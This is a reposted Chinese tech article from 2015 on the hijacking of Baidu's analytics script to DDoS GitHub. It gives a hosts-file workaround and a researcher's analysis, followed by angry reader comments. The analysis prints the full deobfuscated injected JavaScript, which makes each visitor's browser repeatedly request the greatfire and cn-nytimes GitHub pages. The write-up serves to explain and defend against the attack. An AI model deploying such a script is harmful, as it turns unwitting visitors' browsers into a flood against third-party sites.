当前位置: 首页 > 网络学院 >

一招解决WARNING: malicious javascript detected on this domain

新客网 XKER.COM 时间:2015-03-28 01:51:56来源:下载吧  评论:

浏览网站的时候不断弹出"WARNING: malicious javascript detected on this domain"窗口,这是中毒了吗?这其实是百度统计JS代码被劫持用来DDOS Github。具体原因是百度联盟的JS被劫持用于对GitHub进行DDOS攻击。而又有很多网站使用了百度联盟,于是很多网站都加载了用于攻击的JS脚本。有意思的是,似乎只有境外IP访问百度联盟网站时才会出现被劫持的情况。

一招解决WARNING: malicious javascript detected on this domain_新客网

临时解决方法

1.修改hosts

在Hosts文件中添加如下条目:

1
2
3
127.0.0.1 hm.baidu.com
127.0.0.1 cbjs.baidu.com
127.0.0.1 dup.baidustatic.com

参考hosts文件修改图文教程android手机怎么修改hosts苹果Macb电脑修改Hosts教程

注意:如果上述方法无效,还烦请大家积极反馈。加入一条"127.0.0.1 github.com"肯定是能解决问题的,但副作用太大。

2.禁止弹窗

谷歌Chrome浏览器或者360极速浏览器等可以屏蔽持续弹出的弹窗,多点击几次确定,然后Chrome就会提示“不再出现警告”。

详细原因分析

今天中午刷着全国最大的信息安全从业人员同性交友社区zone.wooyun.org的时候,忽然浏览器每隔2秒就不断的弹窗:

malicious javascript detected on this domain

enter image description here

我第一反应就是不知道哪个调皮的基友又把zone给XSS了,马上打开开发者工具分析。

0x01 细节


之后立刻发现弹窗的js居然是从github加载的:

一招解决WARNING: malicious javascript detected on this domain_新客网

可是为什么乌云会从github加载js呢,并且还是从greatfire和纽约时报镜像加载。

第一反应是页面有xss或者js被劫持了,找了半天终于找到了,居然是

hm.baidu.com/h.js

这个js的确被乌云加载了没错,这是百度统计的js代码,打开后里面是一个简单加密后的js,eval了一串编码后的内容,随便找了个在线解密看了下,发现如下内容:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>x3c/script>");

!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>x3c/script>");

startime = (new Date).getTime();

var count = 0;

 

function unixtime() {

var a = new Date;

return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3

}

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

NUM = url_array.length;

 

function r_send2() {

var a = unixtime() % NUM;

get(url_array[a])

}

 

function get(a) {

var b;

$.ajax({

url: a,

dataType: "script",

timeout: 1E4,

cache: !0,

beforeSend: function() {

requestTime = (new Date).getTime()

},

complete: function() {

responseTime = (new Date).getTime();

b = Math.floor(responseTime - requestTime);

3E5 > responseTime - startime && (r_send(b), count += 1)

}

})

}

 

function r_send(a) {

setTimeout("r_send2()", a)

}

setTimeout("r_send2()", 2E3);

大概功能就是关闭缓存后每隔2秒加载一次

url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];

里面的两个url

问了下墙内的小伙伴们,他们看到的js都是正常的,但是通过墙外ip访问

http://hm.baidu.com/h.js

就会得到上面的js文件,每隔2秒请求一下这两个url。

打开twitter看了下,似乎从3月18号以来Github就受到了DDoS攻击,之后greatfire把被攻击的页面内容换成了

1

alert("WARNING: malicious javascript detected on this domain")

以弹窗的方式阻止了js的循环执行。

一招解决WARNING: malicious javascript detected on this domain_新客网

图3 国外ip traceroute到hm.baidu.com的记录

似乎DNS并没有被劫持,看来是像之前一样直接把IP劫持了或者直接在HTTP协议里替换文件。

一招解决WARNING: malicious javascript detected on this domain_新客网

扫了下端口,只开了80和443,通过https协议访问后是正常的空页面(只有带referer才会出现js文件)。

一招解决WARNING: malicious javascript detected on this domain_新客网

作者要进行抓包分析时劫持已经停止,在twitter上看到有人已经分析过引用如下:

抓包跟踪,正常百度服务器返回给我日本VPS的TTL为51, RESP返回HTTP 200 OK的报文的TTL是47,可以确定的是有中间设备对VPS发了伪造报文。

一招解决WARNING: malicious javascript detected on this domain_新客网

真是无耻,呵呵

忽然想起一句话,之前DNS被劫持到外国服务器的时候某站长说的:

They have weaponized their entire population.

现在应该是:

They have weaponized their entire population of the Earth.

如果本文对您有帮助请分享给您的好友,也可按Ctrl+D收藏本页面,谢谢!感谢本文来源方:下载吧

评论列表(网友评论仅供网友表达个人看法,并不表明本站同意其观点或证实其描述)
  • caocaocao
    2015-04-04 21:01:39发表

    根本没说解决方法

  • 管理者
    2015-04-04 16:29:13发表

    这个人在献丑

  • 一指禅
    2015-04-04 06:40:47发表

    楼主死了 一堆婆婆妈妈没用废话 结果没用解决的方法 撒泡尿沁死去吧

  • 2015-04-04 05:26:11发表

    malicious javascript detected on this domain還是沒說怎樣解決……

  • 高霄峰
    2015-04-04 04:27:23发表

    不要上国内网站呗~

  • 一点有用的都没说
    2015-04-04 03:31:55发表

    对啊

  • 呵呵
    2015-04-04 02:04:15发表

    说了半天就是体亏思屁?解决你妹啊

  • asd
    2015-04-03 20:31:08发表

    说了半天。。。

  • 大穆勒和小穆勒
    2015-04-03 20:25:45发表

    就是 一招你妹

  • cnm
    2015-03-30 19:35:40发表

    说了一堆废话,解决的办法在哪?

  • FYQ方媛晴
    2015-03-30 17:36:46发表

    怎么弄啊???

  • NLM
    2015-03-29 09:07:43发表

    解决在哪?一招你妹?